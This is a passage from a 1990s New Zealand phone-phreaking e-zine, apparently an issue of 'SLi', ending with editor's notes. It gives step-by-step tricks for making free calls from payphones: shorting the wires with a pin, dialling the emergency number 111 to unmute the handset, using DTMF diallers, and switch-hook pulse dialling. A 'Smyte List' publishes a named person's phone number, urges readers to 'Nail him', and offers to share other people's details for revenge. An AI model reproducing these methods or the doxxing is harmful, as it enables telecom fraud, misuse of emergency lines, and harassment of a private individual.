  2436. shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin
  2437. Phone' within a 3-metre radius, the chances of there being one around greatly
  2438. decreases - or your handy service station.  In the case of the latter suggest-
  2439. ion, there'll almost always be an attendant keeping an eye out on you, but if
  2440. they're slightly busy, they'll most probably be keeping there eyes out for
  2441. other things.
  2442.  
  2443. [Note: Telecom does know of the shortfalls of these fones, and warns their
  2444.        "clients" of the problems these fones have.  So the attendants MIGHT
  2445.        know what's wrong with his/her fone and keep an eye out.]
  2446.  
  2447. In the following, I'll just go over my 'observations' of these fones, and at-
  2448. tempt to explain a bit about how they work - well, as far as I'm aware of, any-
  2449. way.
  2450.  
  2451. [Note: Considering the fact that New Zealand doesn't have the same 'Freedom of
  2452.        Speech' Act, as there is in the States, I'm a little wary of writing
  2453.        this article, so I'll try and keep the ideas to a minimum - that's all
  2454.        they are... ideas.]
  2455.  
  2456.  
  2457. [Type One]
  2458.  
  2459. Description:  'Blue-Buttoned Telephone'.
  2460.  
  2461. [NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone,
  2462.        but, if you are trying 'Idea Two', you must use the particular type
  2463.        which is listed below.]
  2464.  
  2465.    LCD Display shows a blinking 'COIN' which takes up the entire LCD display.
  2466.    When dialling, it doesn't bring up the number onto the display, but you
  2467.    SHOULD be able to hear it dialling.
  2468.  
  2469. Major Colours:  Blue, white, grey and black.
  2470.  
  2471.  
  2472. [Idea One]
  2473.  
  2474.  Get a pin. Dial the number you want to call, push the pin through the wire,
  2475.  running from the fone into the wall, so it shorts the wires together thus
  2476.  making it impossible for the fone to disconnect.  Hang up the fone and pick
  2477.  it back up.  Dial '111' and pull the pin out.  There you go - a free call.
  2478.  
  2479. [Idea Two]
  2480.  
  2481.  Pick up the receiver and dial the number you want - as though you would nor-
  2482.  mally.  It should dial the number for you, and if the line isn't busy, you
  2483.  should be put through okay.  Once the person answers, dial '111' and it should
  2484.  free you from the mute - allowing you to speak freely with the person you have
  2485.  just called.  If you get a 'no-such-number' answer, then perhaps there is a
  2486.  toll-bar on the phone line of the COCOT, otherwise, try another COCOT.
  2487.  
  2488.  
  2489. [Explanation]
  2490.  
  2491.  With these 'blue-buttoned fones', you get your dial-tone and you're even per-
  2492.  mitted to use the keypad.  The only problem...  the microphone.  The micro-
  2493.  phone is muted to stop the person from using the telephone and (from what I'm
  2494.  aware of) can only be 'de-muted' by the user of the telephone inserting a
  2495.  coin, OR dialling '111' [the emergency phone number in NZ - for those of you
  2496.  who are unfamiliar with the number].
  2497.  
  2498.  After the numbers '111' are dialled - regardless of wether the phone has a
  2499.  dial-tone, or not - the microphone loses the 'mute button', and allows the
  2500.  user of the fone to speak into the microphone whilst allowing the receiver
  2501.  of the call to hear the caller.  Of course, the receiver of the phone is un-
  2502.  changed, which allows the caller to hear the recipient of the call, to allow
  2503.  the caller to hear the dial-tone.
  2504.  
  2505.  
  2506. [Type Two]
  2507.  
  2508. Description: 'Brown-Buttoned Telephone'
  2509.  
  2510.    [NOTE:  They have a big orange button with an 'A' on it.]
  2511.  
  2512.    These fones are becoming less common, but are still around.  They have been
  2513.    replaced by either the 'blue-buttoned fone' or have an annoying 'beep' add-
  2514.    ed especially to help us fone phreaks out (NOT!).  A few times, I have come
  2515.    across the odd one or two which have an interrupted dial-tone - a fake one
  2516.    which sticks around until you drop your dandy coin into the coin slot.
  2517.  
  2518. Major Colours: Brown, orange, white and traces of black.
  2519.  
  2520. [Idea One]
  2521.  
  2522.  Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned
  2523.  telephone'.  Just put the dialler's microphone up to the UN-MUTED microphone
  2524.  on the telephone's receiver, and dial away.  Once the person answers, begin to
  2525.  talk.  =)
  2526.  
  2527. [Explanation]
  2528.  
  2529.  The coin's only use appears to be to give the caller access to the dialling
  2530.  pad.  Well, the older versions seem to give that appearance - seeming that
  2531.  there are newer versions hanging about with similar problems (ie. the false
  2532.  dial-tone).  The outer casing (the telephone case) is the same and the only
  2533.  way to tell the difference is to try things out for yourself.  This is a case
  2534.  of just hoping that you're lucky enough to find the ones which work.
  2535.  
  2536.  
  2537. [Type Three]
  2538.  
  2539. Description: 'The Red Phone'
  2540.  
  2541.    These are these rather big, rather OLD, rather chunky, rather, err, well,
  2542.    RED fones.  they have a little red button on them that automatically dials
  2543.    '111'.
  2544.  
  2545. Major Colours:  Uh, a kinda RED colour.  Has traces of white on the keypad for
  2546.                 the numbers.
  2547.  
  2548. [Idea One]
  2549.  
  2550.  The keypad is the only thing not connected so the ol' DTMF trick will work
  2551.  fine.  They seem to be in a lot of T.A.B.'s [horse betting places for those of
  2552.  you who don't know that already].  Simple, aint it?
  2553.  
  2554. [Idea Two]
  2555.  
  2556.  I assume you can also pulse dial using the switch-hook.
  2557.  
  2558.  For those who don't know how to use pulse-dialling, just tap the switch-hook
  2559.  down for a 'split-second' the number of times you need to dial the number with
  2560.  a space of silence between each number (so it knows when the next number is
  2561.  being dialled).  It is a VERY old trick, but I thought I'd add it for those
  2562.  interested.
  2563.  
  2564.    [NOTE: These apply to NZ, but I can't remember what they are everywhere else
  2565.           and plus, I'm not going to type down ALL of the respective numbers!]
  2566.  
  2567.  
  2568.            Phone Number     Number of times
  2569.                              to press s-h
  2570.  
  2571.                 0        -       10
  2572.                 1        -        9
  2573.                 2        -        8
  2574.                 3        -        7
  2575.                 4        -        6
  2576.                 5        -        5
  2577.                 6        -        4
  2578.                 7        -        3
  2579.                 8        -        2
  2580.                 9        -        1
  2581.  
  2582.  ie.  Say you want to dial, 001-202-542-873, you would do this:
  2583.  
  2584.    tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause,
  2585.    8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7.
  2586.  
  2587.  An easy way of remembering it, is to simply add the number to the amount of
  2588.  taps of the switch-hook and it should equal 10.
  2589.  This is an old idea, but it works on these old phones.
  2590.  
  2591.  
  2592.  
  2593.  
  2594.                                    SLi
  2595.  
  2596.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2597.                 ^^^^^                                ^^^^^
  2598.               ^^^^^               Smyte List           ^^^^^
  2599.                 ^^^^^                                ^^^^^
  2600.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2601.  
  2602.                              Southern Lights
  2603.                                    inc.
  2604.  
  2605.  
  2606.  Well, as in all other SLi mags - except #1 - here's a person  [and
  2607.  his info] who has done a pretty stupid thing, and got the members of
  2608.  SLi pissed at him.
  2609.  
  2610.  
  2611.  Name                   Info                          Reason
  2612. --------------------+-------------------------+------------------------------
  2613.  
  2614. Johnathon Patterson   +64-4-527-8021             Pissed CyntaxEra off - not to
  2615. aka [-=[THE_FLY]=-]                              mention a LOT of other ppl.
  2616.                                                  [Eon's note: This guy insulted
  2617.                                                  Cyntax and I.  He DESERVES
  2618.                                                  ALL he GETS.  Nail him.]
  2619.  
  2620.  
  2621. [Note:  If you have someone who has pissed you off lately, you want to 'get in
  2622.         touch' with them and think that we MIGHT have their info, just giz us
  2623.         a bell with your reason for getting back at this person and we'll see
  2624.         what we can do for ya.]
  2625.  
  2626.  
  2627.  
  2628.  
  2629.                                     SLi
  2630.  
  2631.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2632.                 ^^^^^                                ^^^^^
  2633.               ^^^^^           Editors Knotez           ^^^^^
  2634.                 ^^^^^                                ^^^^^
  2635.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2636.  
  2637.                              Southern Lights
  2638.                                    inc.
  2639.  
  2640.  
  2641.   Damn it!  Yet another one of these things! :)
  2642.  
  2643.   Ahh, well, me and Cyntax 'ave given up dak,
  2644.  
  2645.   Oh, yeah - Happy April Fools! :=)
  2646.  
  2647.   Well, it's the end of another SLi mag.  Guess it's getting rather predict-
  2648.   able now.
  2649.  
  2650.   Well, SLi BBS PRIVATE NODE is up!  Email hacker_m@ix.wcc.govt.nz if you
  2651.   want the number and instructions to login including the bbs passwd and
  2652.   stuff.  Oh, BTW, it's 14.4... :)
  2653.  
  2654.   ALSO!!! if you want to send us a note, post it to our PO BOX.
  2655.  
  2656.   Here is the shout out you wanted MysTix!
  2657.   PS.  SLi V should be out in 3-4 months.
  2658.  
  2659.   Yeah someone wrote me asking if there was a way to turn off call waiting.
  2660.   Now, I think it's *52.
  2661.  
  2662.   Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security)
  2663.   isn't that bad.  Hey, I'd even accept some feedback from them. :) Anyone
  2664.   wanna write me a letter?  I'm sure you can find my address :\ I take that
  2665.   back.  I'll just say, "tnx Heather" :-<
  2666.  
  2667.   [Maybe I was wrong.  They just killed Cyntax's 3-Way and stuff cause of her
  2668.    VMB "ooops".  So be it.]
  2669.  
  2670.   God, that Bill Gates guy is a s[h]muck!  What an _elite_ haircut he has!
  2671.   And, the glasses!  Yuck!  Oh, god!  Look at the tie!!  Yellow and black
  2672.   rectangles!  Of course this is MY opinion and may not be that of the
  2673.   civilized world
  2674.  
  2675.  [CyntaxEra's Note:  Apologies go out to any people reading this who have that
  2676.                      tie - we're very sorry for you. ;)]
  2677.  
  2678.  
  2679.   Another Tip:  SLi uses 2048 bit encryption on our IMPORTANT junk, and
  2680.   512 on our misc stuff - thanks to PGP 2.4x <not the new one, 'cause the US
  2681.   Government have indorced it>.
  2682.  
  2683.   Any BBS's that would like to become an OFFICIAL SLi release point, please
  2684.   POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ.
  2685.  
  2686.  
  2687.   A Final NOTE:
  2688.  
  2689.   We are ALL New Zealanders - not black, not white but united under ONE
  2690.   flag.  We are one nation.  May we once again become one people.
  2691.   Our flag is the symbol of our country, to all who spit on it, to all who
  2692.   stomp on it.  Take note that thousands died for that flag - both white and
  2693.   black!  Do not EVER stand on, or deface, OUR symbol of OUR country, for we
  2694.   are ONE people united.  If you wish to show your disaproval, do it in a
  2695.   rightous and honourable way.  Not in such a childish and immature way
  2696.   without any fore-thought at all.
  2697.  
  2698.  
  2699. [This is in accordance to the current disagreements between NZ and a small
  2700.  percentage of Maori New Zealanders in reference to this year's Waitangi Day -
  2701.  A day which should have been celebrated by all. Sadly the acts of a few have
  2702.  made this country two people under one divided flag. Be ashamed of yourself
  2703.  all who took part in the division of New Zealand, for these acts will live in
  2704.  the history of New Zealand forever as the day New Zealanders became two
  2705.  peoples.]
  2706.  
  2707.  
  2708.   Well, I'll see you all 'round... 'Till next time...
  2709.  
  2710. ^L
  2711.  
  2712.  
  2713.  
  2714.  
  2715.  
  2716.  
  2717.  
  2718.  
  2719.  
  2720.  
  2721.  
  2722.  
  2723.  
  2724.  
  2725.  
  2726.  
  2727.  
  2728.  
  2729.  
  2730.  
  2731.  
  2732.                             Life is Cursed.
  2733.                        For all who live must die.
  2734.  
  2735.  
  2736.  
  2737.  
  2738.  
  2739.  
  2740.  
  2741.  
  2742.  
  2743.  
  2744.  
  2745.  
  2746.  
  2747.  
  2748.  
  2749.  
  2750.  
  2751.  
  2752.  
  2753.  
  2754.  
  2755.  
  2756.  
  2757.  
  2758. eof
  2759.  
  2760.